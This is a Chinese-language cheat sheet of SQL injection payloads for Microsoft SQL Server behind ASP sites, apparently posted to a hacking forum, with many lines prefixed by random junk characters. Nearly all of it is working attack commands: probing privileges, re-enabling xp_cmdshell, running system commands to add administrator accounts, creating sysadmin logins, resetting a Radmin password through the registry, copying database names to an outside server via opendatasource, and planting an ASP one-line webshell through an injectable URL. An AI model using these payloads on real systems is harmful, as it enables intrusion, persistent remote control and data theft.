阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
7 m" F+ o+ C* r! d- [0 Aand 1=(Select IS_MEMBER('db_owner'))
( g# S6 X# ^$ z# IAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
$ o% Q/ [) p+ u3 {
* d/ D8 [) G* n, Y; \//检测是否有读取某数据库的权限
& s( Q. A7 K# C9 aand 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
+ |9 b3 h! v% n

数字类型
( m7 a% z) d# p+ xand char(124)%2Buser%2Bchar(124)=0
( B& [! A; f$ W2 O( \$ W
' G1 {: n8 P, C4 Y: ^3 X. q3 \字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
* Y/ }; M* o4 O# `  k- J% V
搜索类型
/ p% S5 h' t1 t" C1 |5 s1 x( N' and char(124)%2Buser%2Bchar(124)=0 and '%'='
9 ?# v( G( ]7 `" z+ |' `$ c: Y
% ]9 H! g0 t( y: [( P. L: P+ u0 L爆用户名
8 \- {# N2 |6 Z& i+ ~and user>0
' and user>0 and ''='
8 Z# v0 E% h" F
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
5 e1 m' m0 x0 jAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
and exists (select * from sysobjects);--
- k. ]: U  a+ y
5 n' p) h- o9 I- Q4 |9 V检测是否支持多行
& E# E9 R' U0 `" M;declare @d int;--
7 x1 S7 i% T! b% {: |3 |
% h+ ?3 M! z0 t8 K+ K$ O0 s恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--


; J" A' j2 c& u2 M9 l4 \select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

5 I! T1 H4 B: U//-----------------------
//      执行命令
0 u. b% |5 k' `3 N//-----------------------
- `& B' ?4 E8 b首先开启沙盘模式：
9 Z  n; Y/ Q) g6 J9 A' Gexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

3 o1 _% J! e) M2 g. w) X0 W然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
- ~7 w4 v2 v3 i1 @* h: Y' T
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
% n8 T. |3 x$ ]) Whttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

/ D3 ]5 H2 W7 @" g2 t7 U: B9 l写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ
: t: i* d5 e) \* O' A
' J" I' i/ H; t, E2 f读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
* t, V; ]4 W1 w1 Y" q- C
读取目录内容
, l3 I" Y/ e2 L7 f$ H" Cexec master..xp_dirtree 'c:\winnt\system32\',1,1
  Q5 Y# G1 A6 l8 M  O2 W
; [. [1 R/ v  X- ?
数据库备份
backup database pubs to disk = 'c:\123.bak'

) H- Z: Y: U: O1 ]/ N, {- ^//爆出长度
1 n& o  p1 I5 A4 oAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
& X, y3 p) P+ B# y1 W5 G! D

, Q6 w/ {: o# Z7 \: j* b) ~: h
更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

9 G" ?. O6 a0 |' `, A添加和删除一个SA权限的用户test：
0 l: B3 z! P( S/ w  b. sexec master.dbo.sp_addlogin test,ptlove
5 l7 [0 W' ?5 O0 r1 xexec master.dbo.sp_addsrvrolemember test,sysadmin
9 _, q! o0 T# s, R- G! _- y, r
* K! `8 M  A- `# q0 r7 \删除扩展存储过过程xp_cmdshell的语句:
7 e2 S% p: P, Hexec sp_dropextendedproc 'xp_cmdshell'
/ C( X8 Z! Y, N% G
添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
! I) z9 f) b% \. k5 G5 MGRANT exec On xp_proxiedadata TO public

2 q1 w3 m: M$ d& M
停掉或激活某个服务。
- |$ n  n, i% y& P( T$ Z/ F
exec master..xp_servicecontrol 'stop','schedule'
- m6 h% ^& P0 W! o) ]; q$ @* dexec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

9 B+ Y4 I7 _3 A4 ~只列某个目录下的子目录。
' _* Z3 z3 d. M& w) a; wxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
( H$ M# {/ }1 `8 k7 Y
dbo.xp_makecab

% o- E' A9 H1 ]7 {; [$ ^% |2 b- Z) A将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
. a. ], \! C8 U; {'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1
4 N" C1 Z' ^/ t% r

( S  V& y* @' K* a. i) w( g某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
" X% W6 t) D- _& J% }
create database lcx;
Create TABLE ku(name nvarchar(256) null);
$ w  ?! G' u! i8 S/ ECreate TABLE biao(id int NULL,name nvarchar(256) null);

" \1 b9 k4 M, g  I! D//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases


0 Y2 f7 K6 u3 s//在Master中创建表，看看权限怎样
9 F9 A4 R) _) l9 |6 P- g% u" YCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

2 p5 B3 K7 K/ O3 Z/ \7 j8 J用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

//更新表内容
8 ~  Q8 s3 n2 I" e/ t# IUpdate films SET kind = 'Dramatic' Where id = 123

//删除内容
# O7 S8 c4 N0 \6 ^6 L2 R+ q4 t4 G; U  ^delete from table_name where Stockid = 3